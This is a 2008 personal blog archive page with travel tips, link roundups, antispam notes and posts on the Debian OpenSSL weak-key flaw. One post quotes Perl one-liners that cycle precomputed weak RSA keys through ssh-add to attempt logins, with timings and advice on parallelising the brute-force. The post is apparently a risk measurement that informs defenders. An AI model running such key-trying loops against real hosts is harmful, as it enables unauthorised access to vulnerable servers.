Justin's Linklog – Page 87 – (Things I found interesting recently.)

Ireland tourism tips

Published June 5, 2008

connemara

So, Nelson is apparently contemplating a trip to Ireland, and was looking for tips. Since he’s not the first to ask, I thought I’d do some research among my friends on things to do and good places to stay and eat in our native country. Here’s the result.

First off — it’s worth noting that we’re all thirty-somethings, so backpacker stuff and heavy boozing is no longer on the menu. If you’re after that, though, head for Temple Bar in Dublin ;) This is mainly nice hotels, good food, and interesting things to look at.

To start with, I’d recommend driving as a means of getting around. Lots of the good stuff can’t be reached any other way, and the roads are generally pretty good nowadays (if a little narrow).

Prepare for rain.

Things to do: Connemara and Kerry are stunning; in my opinion, they’re unmissable, if you’re coming to Ireland in search of natural beauty. Clare and West Cork are pretty good too. Generally, the west coast is the place to go.

A friend recommends the Skelligs: ‘the best thing I’ve seen in Ireland. If its sunny. If its raining it sucks so don’t go.’ (I’ve never been — appalling, given that my great-grandfather wrote one of the definitive works on them, I need to fix that.)

Stuff to avoid: Dublin’s not too hot, unfortunately. Over-priced and hard to get around due to traffic. I mean, it’s quite nice, especially to live in, but as a tourist destination compared to other cities around the world I don’t quite get the attractiveness. Also, the south-east corner of the country, while full of nice friendly people, is exorbitantly expensive in my experience (even pricier than Dublin!), short on good stuff to see, and a bit of a washout, so I say skip it. (I have no idea why it’s so expensive, BTW. my theory is that it’s a traditional in-country holiday venue for Dubliners, and the Wexford inhabitants love to fleece us, so we got fleeced. whatever.)

In general, I’d say the larger towns aren’t too exciting; stick to the country.

The Lonely Planet guide to Ireland, while frequently backpacker-oriented, is pretty good for non-backpacker stuff as well. If you’re driving around, it’s a good source of offbeat stuff to check out. I used it a lot when driving around Connemara last year. They also do a great book of hikes which I can recommend.

Next, places to stay… that friend again: ‘if you’re doing the Ring of Kerry, I strongly recommend diverting to Valentia and staying in Glanleam House (beautiful grub, beautiful gardens, cheap) and doing a day trip from there to the Skelligs.’

Temple House in Sligo also comes recommended: ‘a classical Georgian mansion set in an estate of 1,000 acres, overlooking a 13th century lakeside castle of the Knights Templar.’

There are lots of useless hotel/B&B sites in Google, making it hard to tell crap from quality. But these sites come recommended:

Ireland’s Blue Book – ‘luxury accommodation in Irish Country House Hotels, Manor Houses and Castles. Also listed are Ireland’s finest gourmet restaurants.’ This is high-end stuff, but it’s pretty reliable, as far as I can see.
Friendly Homes of Ireland – another friend says ‘aka crazy houses of Ireland — terrible webpage, but good accommodation (its also a more attractive guide). We stayed here and loved it.’
Hidden Ireland – ‘a unique collection of historic private houses which provide the very best and most stylish country house accommodation available in Ireland – great Irish hospitality at an affordable price. Our houses are not hotels and are very much more than ordinary guesthouses. They all offer a rare opportunity to experience the lifestyle of a bygone age – a special and fascinating alternative to conventional tourist accommodation.’
Irish Landmark Trust, if you’re interested in self-catering stays at heritage houses.
Georgina Campbell guidebooks are apparently quite good.

Finally, scams and rip-offs are few and far between, so that’s not something to worry about. Crappy service and mediocre food, however, is more likely to be the source of problems. At least you can now get decent espresso pretty much everywhere!

Hope that helps someone ;) Got tips of your own? Feel free to add comments!

links for 2008-06-04

Published June 4, 2008

Spencer Tunick at Dublin Docklands, 21st June 2008

‘Multiple groups of nude participants will be photographed outdoors by Tunick as part of his series of installations that have previously taken place in cities around the world including New York, Amsterdam and Mexico City.’

(tags: nude spencer-tunick dublin docklands june events ireland)
The Big Picture – Boston.com

kokogiak’s amazing blog of top photos hot off the newswires. his selection is fantastic (via Waxy)

(tags: via:waxy fp kokogiak photos newswires images boston.com news)
Linear Bloom Filters

to read — a bunch of Bloom Filter tricks. doesn’t load here yet, but when bos and joshua both bookmark it you know it’s going to be worth reading ;)

(tags: distributed dht bloom-filters algorithms toread)
RailsConf 2008: ‘Introducing Vertebra’ (presentation)

VM pool management using XMPP, used in their ‘EngineYard’ cloud computing platform. I’m sceptical of real-world usage of XMPP, however, since _every_ impl seems to have horrible i14y bugs…

(tags: xmpp jabber rails vms servers server-pools cloud-computing engineyard scaling horizontal-scaling)
HOWTO use video card memory as swap under Linux

brilliant! probably best for non-desktop systems, though. my $400 Dell laptop acting as a home server now has 224MB of additional superfast swap ;)

(tags: linux swap via:preddit hacks video-ram video mtd)

links for 2008-06-03

Published June 3, 2008

App Engine Fan: Efficient Global Counters

nice demo of sharding a counter to avoid locking overhead under heavy load

(tags: sharding databases google app-engine counter)
SkyNet Lives! (aka EC2 @ SmugMug)

great detailed post about SmugMug’s EC2 horizontal-scaling controller

(tags: ec2 aws amazon smugmug scaling servers)

links for 2008-06-01

Published June 1, 2008

How To Set Firefox 3 to Launch Gmail for mailto: Links

insanely complex, requiring hacks in about:config followed by pasting a line of raw Javascript into the address bar. wtf Firefox? (via:wwhyte)

(tags: firefox via:wwhyte javascript gmail mail mailto browsers)
xdotool desktop features

“xdotool”, command-line app to perform window management manipulation for X11, similar to sawfish-ui or Enlightenment’s proprietary UIs, can now activate/warp to windows. must use this to reinstate the Pidgin feature I miss

(tags: pidgin windows wm x11 linux unix window-managers xdotool)
B??d w Debianie – Canonical przestaje wysy?a? p?yty z Ubuntu – PC World Komputer

I’m getting more hits from this Polish article about the Debian/OpenSSL security fiasco, than from many other sources

(tags: debian openssl security poland pc-world)

links for 2008-05-30

Published May 30, 2008

Protest BT’s AGM Meeting in London July 16th

‘There will be a demonstration at the Barbican in London on July 16th 2008 (outside the BT AGM) protesting against the use of Deep Packet Inspection for the purpose of behavioural advertising (specifically Phorm).’ good plan IMO

(tags: bt uk london advertising phorm deep-packet-inspection)
Kohsuke Kawaguchi now working full-time on Hudson

good news, Hudson is a fantastic app!

(tags: hudson ci build automation software coding java)
Revision3 DDOS’d by MediaDefender

Rev3 closed off access to their BitTorrent tracker, used to distribute legit files; MediaDefender, a supposedly legit company, launched a massive SYN flood in response, wiping out their network for a holiday weekend. incredible — here’s hoping Rev3 sue

(tags: mediadefender hacking ddos networking internet bittorrent revision3)
Colonel John Blashford-Snell reviews ‘Indiana Jones and the Kingdom of the Crystal Skull’

‘when he’s hauled out of the swamp by somebody throwing a snake, it was too rubbery and long to be an anaconda. If it was a real anaconda, 2 or 3 people wouldn’t be able to hold it, I can tell you; I’ve tried, and they are enormously strong.’ etc.

(tags: blashford-snell legend explorers funny indiana-jones fact-vs-fiction radio)

TypePad AntiSpam

Published May 30, 2008

TypePad AntiSpam looks pretty cool. I’ve been trying it out for the past week on taint.org and underseacommunity.com, with no false positives or false negatives so far (although mind you I don’t get much spam, anyway, on those blogs, fortunately). Both are WordPress blogs — I set up Akismet, got a TypePad API key, and edited 3 lines in “wp-content/plugins/akismet/akismet.php”, and I was off.

However, here’s the key bit, the bit I’m most excited about — /svn/antispam/trunk/, particularly the GPL v2 LICENSE file — a fully open source backend!

The backend is a perl app built on Gearman and memcached. It uses DSpam instead of SpamAssassin, but hey, you can’t have everything ;) Nice, clean-looking perl code, too. Here’s hoping I get some tuits RSN to get this installed locally…

Daily links are back again

Published May 30, 2008

I’ve been talking to a few people recently who read taint.org (thanks!), but don’t follow the linkblog. This means they miss half of the good bits I post :( Also, there’s no way to comment on linkblog stuff, which is suboptimal.

To remedy this, I’m turning on daily links posting again, where I’ll post the day’s links, once a day, to the main blog.

If you’re not interested, feel free to subscribe to this ‘no-links’ feed URL instead of the default — it’s the main blog content, but with the links posts filtered out.

Upgrading to Firefox 3

Published May 29, 2008

Firefox 3 Release Candidate 1 was released earlier this month. I’ve upgraded.

I tried switching to it a couple of months back, but gave up, since my favourite extensions were AWOL. This time around though, they’re almost all present. Since Firefox is now basically an operating system in its own right, with upgrade pain all of its own, and a couple of people have asked, here’s what I needed to do to get from Firefox 2 to 3:

Make a list of my favoured extensions

Namely, from most important to least:

Create a new Mozilla profile

This allowed me to keep my Firefox 2.0 settings entirely intact, a key step. Install Firefox 3, and start it with “firefox -ProfileManager”, then create a new profile and start with that.

Get installing

The following extensions from the above list were available by now for Firefox 3, through addons.mozilla.org:

Firebug was slightly trickier, since you need the ~~1.1 beta version, directly from their site~~ 1.2 beta version, specially designed for Firefox 3 support, available only from their ‘releases’ page.

However, Greasemonkey, SubmitToTab, and MozEx were still missing. :(

Greasemonkey, thankfully, wasn’t too hard to find — the latest nightly build from this directory does the trick.

MozEx seems dead — the Firefox 2 support was added in a development snapshot, and there’s no sign of Firefox 3 support. This was in danger of becoming a show-stopper, since I spend all day editing text in browser textareas in Trac, Bugzilla, and Wordpress — until I found It’s All Text!, which is even slightly prettier and simpler than MozEx. yay. The only thing to watch out for is that after setting the path to the editor command, I had to quit and restart the browser for it to recognise it as valid.

SubmitToTab is the only desirable plugin remaining. It looks like it won’t be making it any time soon, but I’m prepared to live without it. ;)

Also, while discussing this on Twitter, Vipul wondered if XPather was available — turns out that yes, v1.4 of XPather supports FF3. Looks cool too; I’ve installed it ;)

Copy bookmarks

Exit the browser, copy the “bookmarks.html” file from the old profile directory (~/.mozilla/firefox/jocfzbfo.jm in my case) to the new one (~/.mozilla/firefox/7bkf89ws.ff3), and restart it.

I didn’t bother copying cookies — I’m happy to log in again on all those sites. (I don’t like carrying too much baggage between upgrades…)

I also opened the Greasemonkey user scripts dir (~/.mozilla/firefox/jocfzbfo.jm/gm_scripts), clicked on each script there, and installed them that way to FF3. A little laborious, but nothing serious really.

Done!

End result: I’m using FF3, and it’s working quite nicely. Memory usage is consistently below 300MB, so far — I haven’t seen any bloating yet, which is a big improvement. I’m probably going to stick with it.

One thing: I did have to turn off the new image scaling effect, however — text font size modification also now scales images to match, which is very annoying (and jaggy). No Squint allows this quite neatly.

More details on the “GMail forwarding hole”

Published May 28, 2008

Those INSERT guys who’ve been talking about a GMail security hole allowing spammers to relay spam, have released more previous-redacted details here. (thanks to the MailChannels blog for pointing that out.)

In essence, the attack works by allowing a spammer to set the “forward to” address in GMail to point at a target address, send a spam to the GMail account, then change the “forward to” address to the next target and repeat.

My response:

it’d be trivial for Google to impose stringent rate limits on “forward to” address changes, and I’d be surprised if they haven’t already.
ditto rate-limiting on the rate of forwarding messages for each GMail account.
as they say in the paper — if Google required up-front confirmation of the target address before forwarding any mail, that would also cut this out neatly.
It’s worth noting that GMail’s outbound servers may be whitelisted by some recipient sites, others are treating them negatively — word on the anti-spam “street” is that GMail is becoming a festering pit of 419 scammers these days.

Ammado spam

Published May 26, 2008

Quoting an old job post: ‘ammado.com are a new online global community with headquarters in Dublin, Ireland. ammado are developing a fun interactive online entertainment platform catering for a huge global market, using the latest technologies.’

Well, using that and spam, it seems. Look what just arrived in my inbox:

X-Spam-Status: No, score=-8.0 required=5.0 tests=BAYES_50, EXTRA_MPART_TYPE, HABEAS_ACCREDITED_COI, HTML_MESSAGE, RP_MATCHES_RCVD,SPF_PASS shortcircuit=no autolearn=unavailable version=3.3.0-r650054

X-Spam-Relays-External: [ ip=89.101.128.81 rdns=mail.ammado.com helo=mail.ammado.com by=soman.fdntech.com ident= envfrom= intl=0 id=4856CBA51B8 auth= msa=0 ] [ ip=192.168.11.20 rdns= helo=amsrvmail001.ammado.local by=amsrvmail001.ammado.local ident= envfrom= intl=0 id= auth= msa=0 ]

From: Peter Conlon <pconlon/at/ammado.com>

Date: Mon, 26 May 2008 10:45:11 +0100

Subject: UNHCR asks the blogosphere for help

UNHCR and ammado, http://www.ammado.com are reaching out to the blogosphere in an effort to spread the word for this year’s World Refugee Day on June 20th and raise awareness of the situation of refugees all over the world!

This year, World Refugee Day is about protection, the heart and soul of UNHCR. With rising oil prices, decreasing food supplies, the adverse affects of climate change, the ongoing crisis in Darfur and a high number of unexpected natural disasters including those in Myanmar and China, the world’s refugees have never been more in need of protection.

Another day, another spam. They also spammed Donncha, Michele and Damien, so it sounds like they’re doing the rounds of the Irish blogosphere.

(Update: add Tom, Suzy, Alexia, squid at Limerick Blogger, and Grandad at Head Rambles to that list, too.)

However — the hit on the HABEAS_ACCREDITED_COI SpamAssassin rule means that Ammado are a member of the Habeas Accredited Confirmed-Opt-In program, meaning that they have undertaken a bond to only email people who signed up to receive their communications using “confirmed opt-in”. I have never had any dealings with Ammado, or opted in in any way to receive communication from them — let alone confirmed an opt-in. This is out-and-out unsolicited bulk email, or spam, so this may turn out to be an expensive mistake for Ammado.

If you also got spammed by a Habeas-accredited sender, send a complaint to complaints /at/ habeas.com. This is how the Habeas system works…

PS: This is a good illustration of how spam is not Unsolicited Commercial Email, but UBE — Unsolicited Bulk Email. Even though this is non-commercial, it’s still spam!

MailChannels’ Traffic Control now free-as-in-beer

Published May 19, 2008

I’m on the technical advisory board for MailChannels, a company who make a commercial traffic-shaping antispam product, Traffic Control. Basically, you put it in front of your real MTA, and it applies “the easy stuff” — greet-pause, early-talker disconnection, lookup against front-line DNSBLs, etc. — in a massively scalable, event-driven fashion, handling thousands of SMTP connections in a single process. By taking care of 80% of the bad stuff upfront, it takes a massive load off of your backend — and, key point, off your SpamAssassin setup. ;)

Until recently, the product was for-pay and (relatively) hard to get your hands on, but as of today, they’re making it available as a download at http://mailchannels.com/download/. Apparently: “it’s free for low-volume use, but high volume users will need a license key.”

Anyway, take a look, if you’re interested. I think it’s pretty cool. (And I’m not just saying that because I’m on their tech advisory board. ;)

LWN.net on the Debian OpenSSL fiasco

Published May 19, 2008

Great article from LWN.net regarding the Debian OpenSSL vulnerability:

It is in the best interests of everyone, distributions, projects, and users, for changes made downstream to make their way back upstream. In order for that to work, there must be a commitment by downstream entities — typically distributions, but sometimes users — to push their changes upstream. By the same token, projects must actively encourage that kind of activity by helping patch proposals and proposers along. First and foremost, of course, it must be absolutely clear where such communications should take place.

Another recently reported security vulnerability also came about because of a lack of cooperation between the project and distributions. It is vital, especially for core system security packages like OpenSSH and OpenSSL, that upstream and downstream work very closely together. Any changes made in these packages need to be scrutinized carefully by the project team before being released as part of a distribution’s package. It is one thing to let some kind of ill-advised patch be made to a game or even an office application package that many use; SSH and SSL form the basis for many of the tools used to protect systems from attackers, so they need to be held to a higher standard.

+1.

The viability of remote SSH key cracking

Published May 16, 2008

Here’s some pretty scary figures from Craig Hughes on the viability of an SSH worm:

when doing this, connecting to localhost:

find rsa -type f ! -name '*.pub' | head -1000 | time perl -e 'my $counter=0; my $keys=""; while(<>) { chomp; $keys = "$keys $_"; next unless (++$counter)%7 == 0; system("ssh-add$keys 2>/dev/null"); system ('"'"'ssh -q -n -T -C -x -a testuser@localhost'"'"'); system("ssh-add -D"); $keys = ""; }'

4.63user 3.06system 0:19.54elapsed

ie about 50 per second

when connecting remotely over the internet (ping RTT is ~60ms):

find rsa -type f ! -name '*.pub' | head -1000 | time perl -e 'my $counter=0; my $keys=""; while(<>) { chomp; $keys = "$keys $_"; next unless (++$counter)%7 == 0; system("ssh-add$keys 2>/dev/null"); system ('"'"'ssh -q -n -T -C -x -a testuser@example.com'"'"'); system("ssh-add -D"); $keys = ""; }'

1.10user 0.60system 0:35.15elapsed

ie about 6 per second over the internet.

Logging of the failures on the server side looks like this:
May 15 10:53:31 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50445;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:32 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50446;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:33 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50447;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:34 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50448;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:35 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50451;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:36 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50452;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:37 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50453;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:39 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50455;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:40 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50456;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:41 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50457;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:42 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50458;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:43 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50459;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
ie it shows the connection attempt, but NOT the failure. It shows one connection attempt per 7 keys attempted.

So given that:

RSA is the default if you don’t specify for ssh-keygen

99.99% of people use x86

PID is sequential, and there’s almost certainly an uneven distribution in PIDs used by the keys out there in the wild

then:

Probably there’s about 10k RSA keys which are in some very large fraction of the (debian-generated) authorized_keys files out there. These can be attempted in about 1/2 an hour, remotely over the internet. You can hit the full 32k range of RSA keys in an hour and a half. Note that the time(1) output shows how little load this puts on the client machine — you could easily run against lots of target hosts in parallel; most of the time is spent waiting for TCP roundtrip latencies. Actually, given that, you could probably accelerate the attack substantially by parallelizing the attempts to an individual host so you have lots of packets in flight at any given time. You could probably easily get up towards the 50/s local number doing this, which brings time down to about 3-4 minutes for 10k keys, or 11 minutes for the full 32k keys.

Free SSL cert reissuance for Debian victims — unless you’re on RapidSSL

Published May 16, 2008

If you’ve been following the Debian OpenSSL pRNG security debacle, you may have noticed that there’s a painful problem for people who’ve used a Debian or Ubuntu system in the process of buying a commercial SSL key — they are in a situation where those commercially-purchased keys need to be regenerated.

(When an SSL key is obtained from a commercial Certificate Authority, you first have to generate a Certificate Signing Request on your own machine, then send that to the CA, who extracts its contents and applies a signature to produce a valid CA-issued certificate.)

Things are looking up for these victims, though — some smart cookie at Debian came up with these instructions:

SSL Certificate Reissuance

If you paid good money to have a vulnerable key signed by a Certificate Authority (CA), chances are your CA can re-issue a certificate for free, provided all information in the CSR is identical to the original CSR. Create a new key with a non-vulnerable OpenSSL installation, re-create the CSR with the same information as your original (vulnerable) key’s CSR, and submit it to your CA according to their reissuance policy:

GeoTrust: Here (Available throughout the lifetime of the certificate. Tucows/OpenSRS in this case, but the instructions are generic to any GeoTrust client.)

Thawte: Here (Available throughout the lifetime of the certificate.)

VeriSign: Unknown

GoDaddy: Here (Only possible within 30 days of the initial order. GoDaddy calls the process “re-keying”, while they call the act of sending you the same signed certificate as your original order a “reissuance”.)

ipsCA: Generate a new CSR as if you are purchasing a new certificate, follow through the procedure up until you get to the point where you are required to pay with your credit card. At that point contact support via their email and let them know that you are requesting a revocation and re-issue and include the ticket number of your new CSR request.

CAcert: This is a cost free certification authority. Simply revoke your old certificates and add new ones. (The key has to be created on a fixed machine and ONLY the certification request has to be uploaded!) At the moment the certificate generation will take some time as it seems that many users are re issue there certificate.

Digicert: Login to Your account to re-issue (free).

This is slightly incorrect, however (unfortunately for me). While GeoTrust claim to offer free reissuance of all its SSL certificates, they don’t really. Their low-cost RapidSSL certs require that you buy ‘reissue insurance’ for $20 to avail of this, if you need to reissue more than 7 days after the initial purchase. :( Wiki updated.

Update: RapidSSL certs are, indeed, now free to reissue! Use this URL and click through on the “buy” link for reissuance insurance — the price quoted will be $0. Wiki re-updated ;). (thanks to ServerTastic for the tip.)

Serious Debian/Ubuntu openssl/openssh bug found

Published May 13, 2008

via Reddit, this Debian Security announcement:

‘Luciano Bello discovered that the random number generator in Debian’s openssl package is predictable. This is caused by an incorrect Debian-specific change to the openssl package (CVE-2008-0166). As a result, cryptographic key material may be guessable.

It is strongly recommended that all cryptographic key material which has been generated by OpenSSL versions starting with 0.9.8c-1 on Debian systems (ie since 2006! –jm) is recreated from scratch. Furthermore, all DSA keys ever used on affected Debian systems for signing or authentication purposes should be considered compromised; the Digital Signature Algorithm relies on a secret random value used during signature generation.’

and, of course, here’s the Ubuntu Security Notice for the hole:

Who is affected

Systems which are running any of the following releases:

Ubuntu 7.04 (Feisty)

Ubuntu 7.10 (Gutsy)

Ubuntu 8.04 LTS (Hardy)

Ubuntu “Intrepid Ibex” (development): libssl <= 0.9.8g-8

Debian 4.0 (etch) (see corresponding Debian security advisory)

and have openssh-server installed or have been used to create an OpenSSH key or X.509 (SSL) certificate. All OpenSSH and X.509 keys generated on such systems must be considered untrustworthy, regardless of the system on which they are used, even after the update has been applied. This includes the automatically generated host keys used by OpenSSH, which are the basis for its server spoofing and man-in-the-middle protection.

It was apparently caused by this incorrect “fix” applied by the Debian maintainers to their package. One wonders why that fix never made it upstream.

Bad news….

Update: Ben Laurie tears into Debian for this:

What can we learn from this? Firstly, vendors should not be fixing problems (or, really, anything) in open source packages by patching them locally – they should contribute their patches upstream to the package maintainers. Had Debian done this in this case, we (the OpenSSL Team) would have fallen about laughing, and once we had got our breath back, told them what a terrible idea this was. But no, it seems that every vendor wants to “add value” by getting in between the user of the software and its author.

+1!

For what it’s worth, we in Apache SpamAssassin work closely with our Debian packaging team, tracking the debbugs traffic for the spamassassin package, and one of the Debian packagers is even on the SpamAssassin PMC. So that’s one way to reduce the risk of upstream-vs-package fork bugs like this, since we’d have spotted that change going in, and nixed it before it caused this failure.

Here’s a question: should the OpenSSL dev team have monitored the bug traffic for Debian and the other packagers? Do upstream developers have a duty to monitor downstream changes too?

This comment puts it a little strongly, but is generally on the money in this regard:

the important part for OpenSSL is to find a way to escape the blame for their fuck-up. They failed to publish the correct contact address for such important questions regarding OpenSSL. Branden (another commenter –jm) noted that the mail address mentioned by Ben is not documented anywhere. It is OpenSSL’s responsibility that they allowed the misuse of openssl-dev for offtopic questions and then silently moving the dev stuff to a secret other list nobody outside OpenSSL knew about.

I’m sure Debian is willing to take their fair share of the blame if OpenSSL finally admits that their mistake played a major role here as well. After all the Debian maintainer might have misrepresented the nature of his plans, but he gave warning signs and said he was unsure. But as it appears now all the people who might have noticed secretly left openssl-dev, the documented place for that kind of questions. This is hardly the fault of the maintainer.

Update 2: this Reddit comment explains the hole in good detail:

Valgrind was warning about unitialized data in the buffer passed into ssleay_rand_bytes, which was causing all kinds of problems using Valgrind. Now, instead of just fixing that one use, for some reason, the Debian maintainers decided to also comment out the entropy mixed in from the buffer passed into ssleay_rand_add. This is the very data that is supposed to be used to see the random number generator; this is the actual data that is being used to provide real randomness as a seed for the pseudo-random number generator. This means that pretty much all data generated by the random number generator from that point forward is trivially predictable. I have no idea why this line was commented out; perhaps someone, somewhere, was calling it with uninitialized data, though all of the uses I’ve found were with initialized data taken from an appropriate entropy pool.

So, any data generated by the pseudo-random number generator since this patch should be considered suspect. This includes any private keys generated using OpenSSH on affected Debian systems. It also includes the symmetric keys that are actually used for the bulk of the encryption.

A pretty major fuck-up, all told.

Update 3: Here’s a how-to page on wiki.debian.org put together by the folks from the #debian IRC channel. It has how-to information on testing your keys for vulnerability using a script called ‘dowkd.pl’, details of exactly what packages and keys are vulnerable, and instructions on how to regenerate keys in each of the (many) affected apps.

It notes this about Apache2 SSL keys:

According to folks in #debian-security, if you have generated an SSL key (normally the step just prior to generating the CSR, and then sending it off to your SSL certificate provider), then the certificate should be considered vulnerable.

So, bad news — SSL keys will need to be regenerated. Add ‘costly’ to the list of downsides. (Yet another update: this hasn’t turned out quite that badly after all — many CAs are now offering free reissuance of affected certs.)

Looking at ‘dowkd.pl’, it gets even worse for ssh users. It appears the OpenSSH packages on affected Debian systems could only generate 1 of only 262148 distinct keypairs. Obviously, this is trivial to brute-force. With a little precomputation (which would only take 14 hours on a single desktop!), an attacker can generate all of those keypairs, and write a pretty competent SSH worm. :(

Update: voila, precomputed keypairs, and figures on the viability of remote brute-forcing the keyspace in 11 minutes.

Full-text RSS bookmarklet

Published May 12, 2008

This site offers a nifty utility for dealing with those annoying sites which offer only partial text content in their RSS and Atom feeds.

Given an RSS or Atom feed’s URL, the CGI will iterate through the posts in the feed, scrape the full text of each post from its HTML page, and re-generate a new RSS feed containing the full text.

The one thing it’s missing is a one-click bookmarklet version. So here it is:

Full-text RSS Bookmarklet

Drag that to your bookmarks menu, and next time you’re looking at a partial-text feed, click the bookmark to transform the viewed page into the full-text version. Enjoy!

Guinness in Ireland dodges a bullet

Published May 10, 2008

Phew! The rumours were untrue. Diageo will not be closing down the Guinness brewery in Dublin 8, and will continue brewing the black stuff in Dublin 8, thankfully:

Diageo is to close its breweries at Kilkenny and Dundalk, significantly reduce its brewing capacity at St James’s Gate and build a new brewery on the outskirts of Dublin under a plan announced today.

The company said it would invest EUR 650 million (£520 million) between 2009 and 2013 in the restructuring.

The renovation of the St James’s Gate brewing operations is expected to cost around EUR 70 million and will see the volume of Guinness brewed there fall from around one billion pints a year, to just over 500 million.

This plant will serve the Irish and British markets and will be based on the Thomas St side of the site. The company said this would ensure that every pint of Guinness sold in Ireland would be brewed here. Approximately half of the 55 acre site will then be sold once the five-year project is complete.

Around 65 staff will remain in brewing operations at St James’s Gate with about 100 others due to transfer to the new Dublin plant. Although the company has yet to announce the exact location of its new brewery, the company says it will have a capacity of around nine million hectolitres, or around three times that of the refurbished St James’s Gate site. This new brewery will produce Guinness for export and ales and lagers for the Irish market.

Diageo said when the two Dublin breweries are fully operational in five years time it will transfer brewing out of the Kilkenny and Dundalk breweries and close these plants. This move will result in ‘a net reduction in staff of around 250’, the company said.

The company employs 800 people in its brewing operation and a total of 2,500 in the Republic and Northern Ireland.

Diageo said these two plants “do not have the scale necessary for sustained success in increasingly competitive market conditions”.

The company said it would offer those employees relocation opportunities where possible. Those for whom relocation is not possible will be offered “a severance package alongside career counselling”.

Operations at its Waterford brewery will be “streamlined” as part of the re-organisation leading to “some reduction in output”. the current workforce of 27 in Waterford would be reduced to ‘around 18’ but Diageo was unable to confirm the extent of the output reduction.

The company says the St James’s Gate site it proposes to sell and the Kilkenny and Dundalk sites have an estimated value of EUR 510 million.

The Guinness Storehouse, which receives around 900,000 visitors a year, will continue to be based at St. James’s Gate.

The company estimates it will incur one-off costs of EUR 152 million during the restructuring and says this would be treated as an exceptional cost in the fiscal year ending in June 2008.

Paul Walsh, chief executive of Diageo said: ‘Over the last twelve months we have conducted a rigorous review of our brewing operations in Ireland. It examined many options and I believe it has identified the right formula for the long-term success of our business in Ireland and for the continued global success of the Guinness brand.’

“Our ambition is to combine the most modern brewing standards with almost 300 years of brewing tradition, craft and heritage.”

Guinness has been brewed at St James’s Gate for almost 250 years. Guinness extract produced at the Dublin site is exported to more than 45 countries.

the Lisbon Treaty and Libertas’ astroturf

Published May 8, 2008

So, Irish voters will soon be voting in a state-wide referendum on the upcoming Treaty of Lisbon — the latest set of amendments to how the European Union is run.

Since ratification will require changes to the Irish constitution, we get to vote on these intricacies where most EU inhabitants do not. Unfortunately this means it’s not particularly “sexy” — it’s a pretty obtuse and boring set of issues, and deciding which way to vote is not easy, with such snore-worthy stuff at stake.

One of the organisations campaigning for a “no” vote in the referendum is called Libertas. Aileen forwarded on a very interesting article by Chekov Feeney on Indymedia Ireland about them, which is well worth a read if you’re interested in Irish politics and the international reach of US lobbying. Here’s some snippets:

Declan Ganley, president of Libertas, happens to be president of Rivada Networks, a US defence contractor (they supply emergency communications networks to the US intelligence community).

[…]

On Sunday April 20th, Libertas announced that Ulick McEvaddy was “joining the No To Lisbon Campaign” and publicised the event with a photo-opportunity of the two ‘entrepreneurs’ in front of the Libertas Campaign bus. McEvaddy is the first member of the Irish business and political elite to join the Libertas campaign since it emerged under the stewardship of Declan Ganley.

What’s particularly interesting about this is that McEvaddy is the CEO of Omega Air, a US defence contractor (they supply cargo planes and inflight refuelling services to the US military). […] According to the [ US Air Force’s Integrator Magazine ], “industry insiders say [McEvaddy’s] company has even approached U.S. intelligence agencies about tanking services for detainee transfers, to reduce dependence on foreign air fields.” In other words, offering to provide inflight refuelling services to rendition flights so that they wouldn’t have to stop over at foreign airports such as Shannon on their way to “interrogate” suspects. A very accommodating offer indeed.

McEvaddy was also the figure who got himself appointed to the board of Knock airport with a view to opening it up to US military flights.

Nice guys, then.

The article goes on, and on, and on, detailing some shady transactions involving these guys and their US military/intelligence connections, the “astroturf” nature of the Libertas organisation, and the odd behaviour of the Libertas campaign in general.

It comes to this conclusion:

This article has examined the reality behing the Libertas campaign, the connections of its two high-profile backers, the implausibility of its message, the peculiar nature of its campaign and some of the underlying strategic differences at play. The conclusion is that the evidence suggests that Libertas is most likely to serve primarily as a vehicle for advancing US strategic interests.

Check it out — it’s a must-read.

BoI data breach: a sample customer notification

Published May 2, 2008

More on the Bank of Ireland 30,000-customer data breach (which is up to 31,500 people by now — BoI promised to contact the “affected” customers by post, warning them that their data had been leaked. If you were wondering what those letters might look like, wonder no more. Here’s one, via a friend who found himself in this unenviable position:

So it’s not just name, date of birth, and address — he notes that they’ve leaked ‘information on the current account I use to pay for the policy.’

Interestingly, he says that his life assurance policy was set up directly with their life assurance department, not via the local branch — which directly contradicts what BoI say on their website:

The laptops contained information relating to some customers who either obtained a quote or took out a Life Assurance policy with Bank of Ireland Life from the following branches: [… list of branches omitted…]

The update from 28 April doesn’t clarify this, either. Hmm.

Google Webmaster Tools now includes ‘goog-love.pl’

Published May 1, 2008

Back in 2006, I wrote a script I called “goog-love.pl”; it used Google’s now-dead SOAP search API (thanks, Nelson!) to figure out which Google queries your web site was “winning” on. Unfortunately, Google shut down new signups for the SOAP interface later that year.

I was just looking through Google’s Webmaster Tools page for taint.org, when I came across the Statistics / Top search queries page:

This is exactly what goog-love.pl produced. hooray!

Bank of Ireland: “we don’t understand fraud”

Published April 28, 2008

Check out this logic from the Bank of Ireland, spotted by waider in today’s news:

